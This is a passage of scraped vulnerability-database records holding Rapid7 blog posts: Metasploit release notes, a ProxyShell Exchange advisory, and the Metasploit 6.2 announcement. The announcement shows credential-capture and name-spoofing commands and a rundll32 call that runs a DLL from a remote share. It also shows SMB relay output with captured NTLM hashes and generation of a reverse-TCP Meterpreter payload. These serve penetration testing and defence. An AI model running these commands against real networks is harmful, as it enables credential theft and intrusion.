6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-08-12T17%3A57%3A38%2B01%3A00..2021-08-20T05%3A13%3A43-05%3A00%22>)\n * [Full diff 6.1.0...6.1.1](<https://github.com/rapid7/metasploit-framework/compare/6.1.0...6.1.1>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-20T19:12:00", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21307", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T19:12:00", "id": "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "href": "https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-25T18:57:37", "description": "\n\n_This attack is ongoing. See the `Updates` section at the end of this post for new information as it comes to light. Rapid7 also has a [technical analysis of the ProxyShell exploit chain](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) in AttackerKB._\n\nOn August 5, 2021, in [a Black Hat USA talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>), DEVCORE researcher Orange Tsai shared information on [several exploit chains](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>) targeting on-premises installations of Microsoft Exchange Server. Among the exploit chains presented were ProxyLogon, which was [exploited en masse in February and March](<https://www.rapid7.com/blog/post/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) of 2021, and ProxyShell, an attack chain originally demonstrated at the Pwn2Own hacking competition this past April. As of August 12, 2021, multiple researchers have detected widespread opportunistic [scanning](<https://twitter.com/bad_packets/status/1425598895569006594>) and [exploitation](<https://twitter.com/GossiTheDog/status/1425844380376735746>) of Exchange servers using the ProxyShell chain.\n\nAccording to Orange Tsai's demonstration, the ProxyShell exploit chain allows a remote unauthenticated attacker to execute arbitrary commands on a vulnerable on-premises instance of Microsoft Exchange Server via port 443. The exploit is comprised of three discrete CVEs:\n\n * [CVE-2021-34473](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34473/>), a remote code execution vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>)\n * [CVE-2021-34523](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-34523/>), an elevation of privilege vulnerability [patched April 13, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>)\n * [CVE-2021-31207](<https://www.rapid7.com/db/vulnerabilities/msft-cve-2021-31207/>), a security feature bypass [patched May 11, 2021](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207>)\n\n_While CVE-2021-34473 and CVE-2021-34523 were patched in April, Microsoft\u2019s advisories note that they were inadvertently omitted from publication until July._\n\nWhen chained, these vulnerabilities allow the attacker to bypass ACL controls, send a request to a PowerShell back-end, and elevate privileges, effectively authenticating the attacker and allowing for remote code execution. Both public and private proof-of-concept exploits have been released as of August 18, 2021\u2014not surprising, since ProxyShell was first demonstrated more than four months ago at Pwn2Own. A number of [technical analyses](<https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/>) of the chain have also [been published](<https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1>). See Rapid7's exploit chain analysis [in AttackerKB](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>).\n\nNotably, there has been confusion about which CVE is which across various advisories and research descriptions \u2014 Microsoft, for instance, describes CVE-2021-34473 as a remote code execution vulnerability, but [Orange Tsai\u2019s Black Hat slides](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) list CVE-2021-34473 as the initial ACL bypass. Community researchers have also [expressed confusion](<https://twitter.com/GossiTheDog/status/1424791670076411905>) over CVE numbering across the ProxyShell chain, but ultimately, the takeaway is the same: Organizations that have not patched these vulnerabilities should do so on an emergency basis and invoke incident response protocols to look for indicators of compromise.\n\n## Affected products\n\nThe following versions of Exchange Server are vulnerable to all three ProxyShell CVEs:\n\n * Microsoft Exchange Server 2019 Cumulative Update 9\n * Microsoft Exchange Server 2019 Cumulative Update 8\n * Microsoft Exchange Server 2016 Cumulative Update 20\n * Microsoft Exchange Server 2016 Cumulative Update 19\n * Microsoft Exchange Server 2013 Cumulative Update 23\n\nOrganizations that rely on on-premises installations of Exchange Server and are not able to move to O365 should ensure that all Exchange instances are patched on a zero-day basis. In order to do this, it is vital that defenders keep up-to-date with quarterly Cumulative Updates, since Microsoft only releases security fixes for [the most recent Cumulative Update versions](<https://docs.microsoft.com/en-us/exchange/new-features/updates>).\n\nWhile ProxyShell and March\u2019s ProxyLogon exploit chain are the two attacks that have already resulted in widespread exploitation, they are not the only exploit chains targeting on-premises Exchange servers. Exchange continues to be valuable and accessible attack surface area for both sophisticated and run-of-the-mill threat actors, and we will certainly see additional widespread exploitation in the future.\n\nRead more from our emergent threat response team on [high-priority attack surface area](<https://www.rapid7.com/blog/post/2021/08/12/popular-attack-surfaces-august-2021-what-you-need-to-know/>), including Windows Print Spooler and Pulse Connect Secure VPNs.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all three ProxyShell CVEs with authenticated vulnerability checks.\n\nThe following attacker behavior detection is available InsightIDR customers:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\nThis detection will identify processes spawned by Microsoft IIS processes that have been configured to serve as Outlook Web Access web servers for Microsoft Exchange. Rogue processes being spawned may be an indication of a successful attack against these systems and has been observed targeted by various malicious actors.\n\nIf this detection fires in your environment, you should determine whether it is part of authorized administrator activity. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having any possibly affected users change their passwords.\n\n## Updates\n\n**August 25, 2021:** Rapid7 estimates that there are over 84,000 Exchange servers that appear vulnerable to the ProxyShell attack chain. \n\n\n**August 23, 2021:** Multiple sources have now [reported](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that at least one ransomware gang (LockFile) is chaining ProxyShell with PetitPotam (CVE-2021-36942) to compromise Windows domain controllers. See [Rapid7's blog on PetitPotam](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>) for patching and additional required mitigation advice.\n\n**August 21, 2021:** Rapid7's Managed Detection and Response (MDR) and Incident Response (IR) teams have noted a significant uptick in Exchange exploitation by multiple threat actors. Community researchers have also noted that attackers are exploiting the ProxyShell vulnerabilities to drop webshells and [spread ransomware](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>) on vulnerable targets.\n\nWe are monitoring for additional attacker behavior and will update this blog as further information comes to light.\n\n**August 16, 2021:** We have begun to see public proof-of-concept (PoC) code implementing the ProxyShell exploit chain. Exploitation is ongoing.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T21:08:43", "type": "rapid7blog", "title": "ProxyShell: More Widespread Exploitation of Microsoft Exchange Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-36942"], "modified": "2021-08-12T21:08:43", "id": "RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "href": "https://blog.rapid7.com/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>))and Windows CVE-2022-30190 ([AttackKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>)\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- : \nThis PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nMetasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we\u2019ve added:\n\n * 138 new modules\n * 148 enhancements and features\n * 156 bug fixes\n\n## Top modules\n\nEach week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).\n\n**Remote Exploitation**\n\n * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. This exploit has been tested on both Windows and Linux targets.\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).\n\n**Local Privilege Escalation**\n\n * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.\n * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.\n\n## Capture plugin\n\nCapturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.\n\nAfter running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.\n\nIn the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:\n \n \n msf6 > load capture\n [*] Successfully loaded plugin: Credential Capture\n msf6 > captureg start --ip 192.168.123.128\n Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339\n [+] Authentication Capture: DRDA (DB2, Informix, Derby) started\n [+] Authentication Capture: FTP started\n [+] HTTP Client MS Credential Catcher started\n [+] HTTP Client MS Credential Catcher started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: MSSQL started\n [+] Authentication Capture: MySQL started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: PostgreSQL started\n [+] Printjob Capture Service started\n [+] Authentication Capture: SIP started\n [+] Authentication Capture: SMB started\n [+] Authentication Capture: SMTP started\n [+] Authentication Capture: Telnet started\n [+] Authentication Capture: VNC started\n [+] Authentication Capture: FTP started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: SMTP started\n [+] NetBIOS Name Service Spoofer started\n [+] LLMNR Spoofer started\n [+] mDNS Spoofer started\n [+] Started capture jobs\n \n\nOpening a new terminal in conjunction with the `tail` command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:\n \n \n $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n \n [+] Received SMB connection on Auth Capture Server!\n [SMB] NTLMv2-SSP Client : 192.168.123.136\n [SMB] NTLMv2-SSP Username : EXAMPLE\\Administrator\n [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000\n \n\nIt is also possible to log directly to stdout without using the `tail` command:\n \n \n captureg start --ip 192.168.123.128 --stdout\n \n\n## SMB v3 server support\n\nThis work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).\n\nMetasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.\n\nExample usage:\n \n \n ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point\n \n\nThis can be useful for copying files onto remote targets, or for running remote DLLs:\n \n \n copy \\\\192.168.123.1\\home\\example.txt .\n rundll32.exe \\\\192.168.123.1\\home\\example.dll,0\n \n\nAll remaining Metasploit modules have now been updated to support SMB v3. Some examples:\n\n * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\\\192.168.123.128\\tHKPx\\WeHnu,0`\n * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking\n * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.\n * `exploit/windows/smb/smb_relay`: Covered in more detail below.\n\n## Enhanced SMB relay support\n\nThe `windows/smb/smb_relay` has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.\n\nExample module usage:\n \n \n use windows/smb/smb_relay\n set RELAY_TARGETS 192.168.123.4 192.168.123.25\n set JOHNPWFILE ./relay_results.txt\n run\n \n\nIncoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:\n \n \n msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22\n [*] Received request for \\admin\n [*] Relaying to next target smb://192.168.123.4:445\n [+] identity: \\admin - Successfully authenticated against relay target smb://192.168.123.4:445\n [SMB] NTLMv2-SSP Client : 192.168.123.4\n [SMB] NTLMv2-SSP Username : \\admin\n [SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000\n \n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Selecting PowerShell target\n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Executing the payload...\n [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175174 bytes) to 192.168.123.4\n [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000\n \n\nA session will be opened on the relay target with the associated credentials:\n \n \n msf6 exploit(windows/smb/smb_relay) > sessions\n \n Active sessions\n ===============\n \n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)\n \n\nFurther details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).\n\n## Improved pivoting / NATed services support\n\nMetasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that\u2019s provided by the reverse_tcp and reverse_http(s) payload stagers.\n\nWhen a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won\u2019t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on \u2014 in this case, the IP address that the router will forward the incoming connection to.\n\nFor example, with the network configuration:\n\nPrivate IP: 172.31.21.26 (where Metasploit can bind to) \nExternal IP: 10.2.3.4 (where the target connects to Metasploit)\n\nThe Metasploit module commands would be:\n \n \n # Set where the target connects to Metasploit. ListenerBindAddress is a new option.\n set srvhost 10.2.3.4\n set ListenerBindAddress 172.31.21.26\n \n # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.\n set lhost 10.2.3.4\n set ReverseListenerBindAddress 172.31.21.26\n \n\n## Debugging Meterpreter sessions\n\nThere are now two ways to debug Meterpreter sessions:\n\n 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets\n 2. Generate a custom Meterpreter debug build with extra logging present\n\n**Log Meterpreter TLV packets**\n\nThis can be enabled for any Meterpreter session and does not require a special debug Metasploit build:\n \n \n msf6 > setg SessionTlvLogging true\n SessionTlvLogging => true\n \n\nHere\u2019s an example of logging the network traffic when running the `getenv` Meterpreter command:\n \n \n meterpreter > getenv USER\n \n SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n ]>\n \n RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\">\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>\n #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\">\n ]>\n ]>\n \n Environment Variables\n =====================\n \n Variable Value\n -------- -----\n USER demo_user\n \n\n**Meterpreter debug builds**\n\nWe have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.\n\nFor example, within msfconsole you can generate a new payload and create a handler:\n \n \n use payload/python/meterpreter_reverse_tcp\n generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false\n to_handler\n \n\nRunning the payload will show the Meterpreter log output:\n \n \n $ python3 shell.py\n DEBUG:root:[*] running method core_negotiate_tlv_encryption\n DEBUG:root:[*] Negotiating TLV encryption\n DEBUG:root:[*] RSA key: 